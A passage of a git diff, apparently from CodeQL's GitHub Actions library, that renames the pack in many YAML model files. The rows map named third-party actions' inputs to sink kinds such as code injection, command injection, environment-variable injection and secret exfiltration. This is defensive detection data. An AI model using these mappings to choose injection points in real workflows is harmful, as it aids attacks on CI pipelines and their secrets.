\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml
index 0fe5470bb11a..c9b7394f044d 100644
--- a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.build-arguments", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml
index a9cd5759cf2a..36c50c6ad506 100644
--- a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.target", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml
index 5b0dc5da53d2..fc0607380ffe 100644
--- a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "input.config_file", "code-injection", "generated"]
diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml
index c90d1ac8afbd..122a61c76fbf 100644
--- a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "input.needs_context", "code-injection", "generated"]
\ No newline at end of file
diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml
index 8d68efb9247e..26ff1b8d07c4 100644
--- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.image_name", "code-injection", "generated"]
@@ -8,7 +8,7 @@ extensions: - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "code-injection", "generated"] - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "output.build_image", "taint", "manual"]
diff --git a/ql/lib/ext/manual/8398a7_action-slack.model.yml b/ql/lib/ext/manual/8398a7_action-slack.model.yml
index 5687a9729fca..62ffad944930 100644
--- a/ql/lib/ext/manual/8398a7_action-slack.model.yml
+++ b/ql/lib/ext/manual/8398a7_action-slack.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["8398a7/action-slack", "*", "input.custom_payload", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/manual/AsasInnab_regex-action.model.yml b/ql/lib/ext/manual/AsasInnab_regex-action.model.yml
index 2efaefb95b62..d09b5bf0085e 100644
--- a/ql/lib/ext/manual/AsasInnab_regex-action.model.yml
+++ b/ql/lib/ext/manual/AsasInnab_regex-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["AsasInnab/regex-action", "*", "input.search_string", "output.first_match", "taint", "manual"]
diff --git a/ql/lib/ext/manual/MeilCli_regex-match.model.yml b/ql/lib/ext/manual/MeilCli_regex-match.model.yml
index 74a0f43fd91c..45a4441e5ca9 100644
--- a/ql/lib/ext/manual/MeilCli_regex-match.model.yml
+++ b/ql/lib/ext/manual/MeilCli_regex-match.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["MeilCli/regex-match", "*", "input.search_string", "output.matched_first", "taint", "manual"]
diff --git a/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml
index 87620afac709..2f38a2588679 100644
--- a/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml
+++ b/ql/lib/ext/manual/SonarSource_sonarcloud-github-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["SonarSource/sonarcloud-github-action", "*", "input.args", "secret-exfiltration", "manual"]
diff --git a/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml b/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml
index ad7fb8a538cc..ba894b157329 100644
--- a/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml
+++ b/ql/lib/ext/manual/Steph0_dotenv-configserver.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["Steph0/dotenv-configserver", "*", "input.repository", "envvar-injection", "manual"]
diff --git a/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml b/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml
index e2009c888518..a29b008f6c2c 100644
--- a/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml
+++ b/ql/lib/ext/manual/WyriHaximus_github-action-files-in-commit.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/WyriHaximus/github-action-files-in-commit
diff --git a/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml b/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml
index cf23452f7a99..045e1177ae20 100644
--- a/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml
+++ b/ql/lib/ext/manual/aarcangeli_load-dotenv.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aarcangeli/load-dotenv", "*", "artifact", "envvar-injection", "manual"]
diff --git a/ql/lib/ext/manual/ab185508_file-type-finder.model.yml b/ql/lib/ext/manual/ab185508_file-type-finder.model.yml
index 119b4b1d814b..011f078ff688 100644
--- a/ql/lib/ext/manual/ab185508_file-type-finder.model.yml
+++ b/ql/lib/ext/manual/ab185508_file-type-finder.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/ab185508/file-type-finder
diff --git a/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml b/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml
index edc9585b5481..ea86e6f5ec7a 100644
--- a/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml
+++ b/ql/lib/ext/manual/actions-ecosystem_action-regex-match.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["actions-ecosystem/action-regex-match", "*", "input.text", "output.*", "taint", "manual"]
diff --git a/ql/lib/ext/manual/actions_github-script.model.yml b/ql/lib/ext/manual/actions_github-script.model.yml
index f02d8f5b180a..3033719bc3b5 100644
--- a/ql/lib/ext/manual/actions_github-script.model.yml
+++ b/ql/lib/ext/manual/actions_github-script.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["actions/github-script", "*", "input.script", "code-injection", "manual"]
diff --git a/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml
index 77df62717b0d..f245519a061c 100644
--- a/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml
+++ b/ql/lib/ext/manual/ahmadnassri_action-changed-files.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["ahmadnassri/action-changed-files", "*", "output.files", "filename", "manual"]
diff --git a/ql/lib/ext/manual/akefirad_loadenv-action.model.yml b/ql/lib/ext/manual/akefirad_loadenv-action.model.yml
index 8f14138168c7..0116f070183f 100644
--- a/ql/lib/ext/manual/akefirad_loadenv-action.model.yml
+++ b/ql/lib/ext/manual/akefirad_loadenv-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["akefirad/loadenv-action", "*", "artifact", "envvar-injection", "manual"]
diff --git a/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml b/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml
index abdcdd6d6986..c272955c58ef 100644
--- a/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml
+++ b/ql/lib/ext/manual/akhileshns_heroku-deploy.model.yml
@@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["akhileshns/heroku-deploy", "*", "input.branch", "output.status", "taint", "manual"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["akhileshns/heroku-deploy", "*", "input.heroku_app_name", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml b/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml
index 86ce17a9a9b5..5523b7c50675 100644
--- a/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml
+++ b/ql/lib/ext/manual/alessbell_pull-request-comment-branch.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["alessbell/pull-request-comment-branch", "*", "output.head_ref", "branch", "manual"]
diff --git a/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml
index ecfdbfb98a0b..8d49c5436e62 100644
--- a/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml
+++ b/ql/lib/ext/manual/amannn_action-semantic-pull-request.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["amannn/action-semantic-pull-request", "*", "output.error_message", "text", "manual"]
diff --git a/ql/lib/ext/manual/anchore_sbom-action.model.yml b/ql/lib/ext/manual/anchore_sbom-action.model.yml
index ea7ab3125284..d607aee0514a 100644
--- a/ql/lib/ext/manual/anchore_sbom-action.model.yml
+++ b/ql/lib/ext/manual/anchore_sbom-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["anchore/sbom-action", "*", "input.syft-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/anchore_scan-action.model.yml b/ql/lib/ext/manual/anchore_scan-action.model.yml
index 21ea405b32c5..93bfef222696 100644
--- a/ql/lib/ext/manual/anchore_scan-action.model.yml
+++ b/ql/lib/ext/manual/anchore_scan-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["anchore/scan-action", "*", "input.grype-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/andresz1_size-limit-action.model.yml b/ql/lib/ext/manual/andresz1_size-limit-action.model.yml
index 1e95a8c02736..84500597ce23 100644
--- a/ql/lib/ext/manual/andresz1_size-limit-action.model.yml
+++ b/ql/lib/ext/manual/andresz1_size-limit-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["andresz1/size-limit-action", "*", "input.package_manager", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/android-actions_setup-android.model.yml b/ql/lib/ext/manual/android-actions_setup-android.model.yml
index 1ecba6ef1a18..3db7aa5db2cd 100644
--- a/ql/lib/ext/manual/android-actions_setup-android.model.yml
+++ b/ql/lib/ext/manual/android-actions_setup-android.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["android-actions/setup-android", "*", "input.cmdline-tools-version", "output.ANDROID_COMMANDLINE_TOOLS_VERSION", "taint", "manual"]
diff --git a/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml b/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml
index e3c9297cf233..ac01c86d5874 100644
--- a/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml
+++ b/ql/lib/ext/manual/ankitjain28may_list-files-in-pr.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/ankitjain28may/list-files-in-pr
diff --git a/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml b/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml
index 5d7cb6e0b916..47411f7342ad 100644
--- a/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml
+++ b/ql/lib/ext/manual/apple-actions_import-codesign-certs.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["apple-actions/import-codesign-certs", "*", "input.keychain-password", "output.keychain-password", "taint", "manual"]
diff --git a/ql/lib/ext/manual/appleboy_ssh-action.model.yml b/ql/lib/ext/manual/appleboy_ssh-action.model.yml
index c489f8edc85c..087045d86b4a 100644
--- a/ql/lib/ext/manual/appleboy_ssh-action.model.yml
+++ b/ql/lib/ext/manual/appleboy_ssh-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["appleboy/ssh-action", "*", "input.script", "code-injection", "manual"]
diff --git a/ql/lib/ext/manual/asdf-vm_actions.model.yml b/ql/lib/ext/manual/asdf-vm_actions.model.yml
index 26b2e2eb693a..29276b6fdd48 100644
--- a/ql/lib/ext/manual/asdf-vm_actions.model.yml
+++ b/ql/lib/ext/manual/asdf-vm_actions.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["asdf-vm/actions", "*", "input.before_install", "command-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml b/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml
index 99324837e759..db6c52b33fd2 100644
--- a/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml
+++ b/ql/lib/ext/manual/ashley-taylor_read-json-property-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["ashley-taylor/read-json-property-action", "*", "input.json", "output.value", "taint", "manual"]
diff --git a/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml b/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml
index cd827ffc2f87..d20d698c40d6 100644
--- a/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml
+++ b/ql/lib/ext/manual/ashley-taylor_regex-property-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["ashley-taylor/regex-property-action", "*", "input.replacement", "output.value", "taint", "manual"]
diff --git a/ql/lib/ext/manual/aszc_change-string-case-action.model.yml b/ql/lib/ext/manual/aszc_change-string-case-action.model.yml
index 64abc03a5fb3..f0e4e6e31b19 100644
--- a/ql/lib/ext/manual/aszc_change-string-case-action.model.yml
+++ b/ql/lib/ext/manual/aszc_change-string-case-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["aszc/change-string-case-action", "*", "input.string", "output.capitalized", "taint", "manual"]
diff --git a/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml b/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml
index c14bc95c013d..b15eff553369 100644
--- a/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml
+++ b/ql/lib/ext/manual/avraamMavridis_files-changed-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: # https://github.com/AvraamMavridis/files-changed-action
diff --git a/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml b/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml
index 63eb8b21249d..f17f3c788b3b 100644
--- a/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml
+++ b/ql/lib/ext/manual/aws-actions_configure-aws-credentials.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["aws-actions/configure-aws-credentials", "*", "input.aws-access-key-id", "env.AWS_ACCESS_KEY_ID", "taint", "manual"]
diff --git a/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml b/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml
index 170ceb2f95cb..ccdb64fd3f32 100644
--- a/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml
+++ b/ql/lib/ext/manual/axel-op_googlejavaformat-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["axel-op/googlejavaformat-action", "*", "input.commitMessage", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/azure_cli.model.yml b/ql/lib/ext/manual/azure_cli.model.yml
index dcf1de044aaf..588c17bc76a4 100644
--- a/ql/lib/ext/manual/azure_cli.model.yml
+++ b/ql/lib/ext/manual/azure_cli.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["azure/cli", "*", "input.inlineScript", "code-injection", "manual"]
diff --git a/ql/lib/ext/manual/azure_powershell.model.yml b/ql/lib/ext/manual/azure_powershell.model.yml
index a2d08f93928a..901c4cf461e0 100644
--- a/ql/lib/ext/manual/azure_powershell.model.yml
+++ b/ql/lib/ext/manual/azure_powershell.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["azure/powershell", "*", "input.inlineScript", "code-injection", "manual"]
diff --git a/ql/lib/ext/manual/bahmutov_npm-install.model.yml b/ql/lib/ext/manual/bahmutov_npm-install.model.yml
index 7d646dece692..8db78b6e9a8b 100644
--- a/ql/lib/ext/manual/bahmutov_npm-install.model.yml
+++ b/ql/lib/ext/manual/bahmutov_npm-install.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bahmutov/npm-install", "*", "input.install-command", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/blackducksoftware_github-action.model.yml b/ql/lib/ext/manual/blackducksoftware_github-action.model.yml
index fb03722c16ad..20a06102bbdb 100644
--- a/ql/lib/ext/manual/blackducksoftware_github-action.model.yml
+++ b/ql/lib/ext/manual/blackducksoftware_github-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["blackducksoftware/github-action", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/bobheadxi_deployments.model.yml b/ql/lib/ext/manual/bobheadxi_deployments.model.yml
index a14748aead07..043610ab3a36 100644
--- a/ql/lib/ext/manual/bobheadxi_deployments.model.yml
+++ b/ql/lib/ext/manual/bobheadxi_deployments.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["bobheadxi/deployments", "*", "input.env", "output.env", "taint", "manual"]
diff --git a/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml
index 4caf23c8812f..037b67993f3e 100644
--- a/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml
+++ b/ql/lib/ext/manual/bufbuild_buf-breaking-action.model.yml
@@ -1,11 +1,11 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["bufbuild/buf-breaking-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"]
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["bufbuild/buf-breaking-action", "*", "input.input", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml
index 1fa66b8ceb64..7483849b916e 100644
--- a/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml
+++ b/ql/lib/ext/manual/bufbuild_buf-lint-action.model.yml
@@ -1,11 +1,11 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"]
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml
index f2fed75539b4..8f5a15aa1e92 100644
--- a/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml
+++ b/ql/lib/ext/manual/bufbuild_buf-setup-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml b/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml
index 264c3f7b2424..f18fd14a4a61 100644
--- a/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml
+++ b/ql/lib/ext/manual/c-py_action-dotenv-to-setenv.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["c-py/action-dotenv-to-setenv", "*", "artifact", "envvar-injection", "manual"]
diff --git a/ql/lib/ext/manual/cachix_cachix-action.model.yml b/ql/lib/ext/manual/cachix_cachix-action.model.yml
index dfaffaf87deb..f3eabe2c17d7 100644
--- a/ql/lib/ext/manual/cachix_cachix-action.model.yml
+++ b/ql/lib/ext/manual/cachix_cachix-action.model.yml
@@ -1,11 +1,11 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint", "manual"]
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["cachix/cachix-action", "*", "input.installCommand", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/changesets_action.model.yml b/ql/lib/ext/manual/changesets_action.model.yml
index 7bab09bca76d..e1b34c67d492 100644
--- a/ql/lib/ext/manual/changesets_action.model.yml
+++ b/ql/lib/ext/manual/changesets_action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["changesets/action", "*", "input.publish", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml b/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml
index 86759ad40d5c..9f212f145f6a 100644
--- a/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml
+++ b/ql/lib/ext/manual/cloudflare_wrangler-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml b/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml
index f00774d1c4ad..49a399355443 100644
--- a/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml
+++ b/ql/lib/ext/manual/cosq-network_dotenv-loader.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["cosq-network/dotenv-loader", "*", "artifact", "envvar-injection", "manual"]
diff --git a/ql/lib/ext/manual/coursier_cache-action.model.yml b/ql/lib/ext/manual/coursier_cache-action.model.yml
index 65474ba343d6..319f712a9bf1 100644
--- a/ql/lib/ext/manual/coursier_cache-action.model.yml
+++ b/ql/lib/ext/manual/coursier_cache-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint", "manual"]
diff --git a/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml
index e3dd557084b6..772a5d59e188 100644
--- a/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml
+++ b/ql/lib/ext/manual/crazy-max_ghaction-chocolatey.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml
index f3cb32b612ff..3d1366558fe0 100644
--- a/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml
+++ b/ql/lib/ext/manual/crazy-max_ghaction-import-gpg.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/manual/csexton_release-asset-action.model.yml b/ql/lib/ext/manual/csexton_release-asset-action.model.yml
index 639ee965f42e..3da214d62feb 100644
--- a/ql/lib/ext/manual/csexton_release-asset-action.model.yml
+++ b/ql/lib/ext/manual/csexton_release-asset-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSummaryModel
 data:
 - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint", "manual"]
diff --git a/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml
index 40d03569c8d5..37c6af1f99e1 100644
--- a/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml
+++ b/ql/lib/ext/manual/cycjimmy_semantic-release-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSinkModel
 data:
 - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection", "manual"]
diff --git a/ql/lib/ext/manual/cypress-io_github-action.model.yml b/ql/lib/ext/manual/cypress-io_github-action.model.yml
index ed20a5623750..fecc9e5ce055 100644
--- a/ql/lib/ext/manual/cypress-io_github-action.model.yml
+++ b/ql/lib/ext/manual/cypress-io_github-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
+ pack: codeql/actions-all
 extensible: actionsSourceModel
 data:
 - ["cypress-io/github-action", "*", "env.GH_BRANCH", "branch", "manual"]
diff --git a/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml b/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml
index 22725484ea46..34eac65cdc8c 100644
--- a/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml
+++ b/ql/lib/ext/manual/dailydotdev_action-devcard.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: github/actions-all
